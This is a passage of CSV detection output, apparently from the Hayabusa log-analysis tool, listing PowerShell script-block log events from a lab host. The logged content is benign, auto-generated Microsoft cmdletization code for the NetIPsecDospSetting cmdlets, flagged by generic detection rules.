[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"me='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value 
